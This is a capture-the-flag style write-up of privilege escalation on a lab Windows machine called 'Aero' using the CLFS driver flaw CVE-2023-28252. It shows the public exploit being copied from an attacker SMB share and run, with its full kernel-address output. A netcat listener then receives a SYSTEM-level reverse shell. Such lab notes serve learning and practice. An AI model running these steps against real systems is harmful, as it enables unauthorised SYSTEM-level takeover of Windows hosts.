InfoSec LAB

Aero_Privilege_Escalation

Created: 3 min read

CVE-2023-28252

a vulnerability was found in microsoft windows (Operating System). It has been classified as critical. This affects some unknown processing of the component Common Log File System Driver. This is going to have an impact on confidentiality, integrity, and availability.

the vulnerability has been extensively researched by fortra

Exploit

The PoC is available on the Fortra’s GitHub I will download and compile the exploit package

Exploitation

ps c:\Users\sam.emerson\Documents> copy \\10.10.14.4\test\clfs_eop.exe .

Delivery complete over SMB

ps c:\Users\sam.emerson\Documents> .\clfs_eop.exe
.\clfs_eop.exe
[+] Incorrect number of arguments ... using default value 1208 and flag 1 for w11 and w10
 
 
ARGUMENTS
[+] TOKEN OFFSET 4b8
[+] FLAG 1
 
 
VIRTUAL ADDRESSES AND OFFSETS
[+] NtFsControlFile Address --> 00007FFC5C984240
[+] pool NpAt VirtualAddress -->FFFFC20AA30FF000
[+] MY EPROCESSS FFFFD58F670A31C0
[+] SYSTEM EPROCESSS FFFFD58F5E6FC040
[+] _ETHREAD ADDRESS FFFFD58F612BA080
[+] PREVIOUS MODE ADDRESS FFFFD58F612BA2B2
[+] Offset ClfsEarlierLsn --------------------------> 0000000000013220
[+] Offset ClfsMgmtDeregisterManagedClient --------------------------> 000000000002BFB0
[+] Kernel ClfsEarlierLsn --------------------------> FFFFF80360583220
[+] Kernel ClfsMgmtDeregisterManagedClient --------------------------> FFFFF8036059BFB0
[+] Offset RtlClearBit --------------------------> 0000000000343010
[+] Offset PoFxProcessorNotification --------------------------> 00000000003DBD00
[+] Offset SeSetAccessStateGenericMapping --------------------------> 00000000009C87B0
[+] Kernel RtlClearBit --------------------------> FFFFF80362F43010
[+] Kernel SeSetAccessStateGenericMapping --------------------------> FFFFF803635C87B0
 
[+] Kernel PoFxProcessorNotification --------------------------> FFFFF80362FDBD00
 
 
PATHS
[+] folder public path = c:\Users\Public
[+] base log file name path= log:C:\Users\Public\14
[+] base file path = c:\Users\Public\14.blf
[+] container file name path = c:\Users\Public\.p_14
Last kernel CLFS address = FFFFC20A952D0000
numero de tags CLFS founded 11
 
Last kernel CLFS address = FFFFC20A9C9CB000
numero de tags CLFS founded 1
 
[+] log file handle: 0000000000000110
[+] pool clfs kernel address: FFFFC20A9C9CB000
 
number of pipes created =5000
 
number of pipes created =4000
TRIGGER START
system_token_value: FFFFC20A9064159B
SYSTEM TOKEN CAPTURED
Closing Handle
ACTUAL USER=SYSTEM
#< CLIXML

Executing

ps c:\Users\admin\Desktop\ThemeBleed> .\nc64.exe -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.237] 64114
 
ps c:\Users\sam.emerson\Documents> whoami
nt authority\system
ps c:\Users\sam.emerson\Documents> hostname
aero
ps c:\Users\sam.emerson\Documents> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::177
   ipv6 address. . . . . . . . . . . : dead:beef::5aa2:a858:ac20:b1e7
   temporary ipv6 address. . . . . . : dead:beef::9d34:25ac:aeff:695a
   link-local ipv6 address . . . . . : fe80::f370:3a1d:f4c0:2fa%14
   ipv4 address. . . . . . . . . . . : 10.10.11.237
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%14
                                       10.10.10.2

System Level Compromise

Interactive Graph View

Backlinks